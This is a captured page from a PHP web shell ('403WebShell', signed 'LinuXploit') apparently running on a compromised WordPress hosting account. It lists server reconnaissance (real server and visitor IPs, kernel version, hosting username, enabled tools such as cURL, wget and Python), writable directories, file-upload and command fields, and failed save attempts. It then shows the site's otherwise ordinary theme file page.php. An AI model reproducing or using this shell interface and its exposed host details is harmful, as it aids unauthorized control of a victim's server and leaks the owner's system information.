Failed to save the file to the "xx" directory.

Failed to save the file to the "ll" directory.

Failed to save the file to the "mm" directory.

Failed to save the file to the "wp" directory.

403WebShell
403Webshell
Server IP : 66.29.132.124  /  Your IP : 3.133.126.241
Web Server : LiteSpeed
System : Linux business141.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : wavevlvu ( 1524)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/wavevlvu/diixadigital.com/wp-content/themes/meto/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/wavevlvu/diixadigital.com/wp-content/themes/meto/page.php
<?php
/**
 * Default Template Main File.
 *
 * @package METO
 * @author  ThemeKalia
 * @version 1.0
 */

get_header();
$data  = \METO\Includes\Classes\Common::instance()->data('single')->get();
$layout = $data->get('layout');
$sidebar = $data->get('sidebar');
$layout = ($layout) ? $layout : 'right';
$sidebar = ($sidebar) ? $sidebar : 'default-sidebar';
if (is_active_sidebar($sidebar)) {
    $layout = 'right';
} else {
    $layout = 'full';
}
$class = (!$layout || $layout == 'full') ? 'col-xs-12 col-sm-12 col-md-12' : 'col-lg-8 col-md-12 col-sm-12';
?>

<?php if (class_exists('\Elementor\Plugin')):?>
    <?php do_action('meto_banner', $data);?>
<?php else:?>
<!--Page Title-->
<section class="page-title">
	<div class="pattern-layer-one" style="background-image: url(<?php echo esc_url( get_template_directory_uri() ); ?>/assets/images/background/pattern-14.png)"></div>
	<div class="pattern-layer" style="background-image: url(<?php echo esc_url( get_template_directory_uri() ); ?>/assets/images/background/shape-62.png)"></div>
	<div class="auto-container">
		<h2><?php if( $data->get( 'title' ) ) echo wp_kses( $data->get( 'title' ), true ); else( wp_title( '' ) ); ?></h2>
		<ul class="page-breadcrumb">
			<?php echo meto_the_breadcrumb(); ?>
		</ul>
    </div>
</section>
<!--End Page Title-->
<?php endif;?>

<!--Sidebar Page Container-->
<div class="sidebar-page-container">
    <div class="auto-container">
        <div class="row clearfix">

            <?php
            if ($data->get('layout') == 'left') {
                do_action('meto_sidebar', $data);
            }
            ?>
            <div class="content-side blog-details-content <?php echo esc_attr($class); ?>">
                <div class="thm-unit-test">
                    <div class="blog-classic text">
                        <?php while (have_posts()): the_post(); ?>
                            <?php the_content(); ?>
                        <?php endwhile; ?>
                    </div>

                    <div class="clearfix"></div>
                    <?php
                    $defaults = array(
                        'before' => '<div class="paginate-links">' . esc_html__('Pages:', 'meto'),
                        'after'  => '</div>',

                    );
                    wp_link_pages($defaults);
                    ?>
                    <?php comments_template() ?>
                </div>
            </div>
            <?php
            if ($layout == 'right') {
                $data->set('sidebar', 'default-sidebar');
                do_action('meto_sidebar', $data);
            }
            ?>

        </div>
    </div>
</div><!-- blog section with pagination -->
<?php get_footer(); ?>

Youez - 2016 - github.com/yon3zu
LinuXploit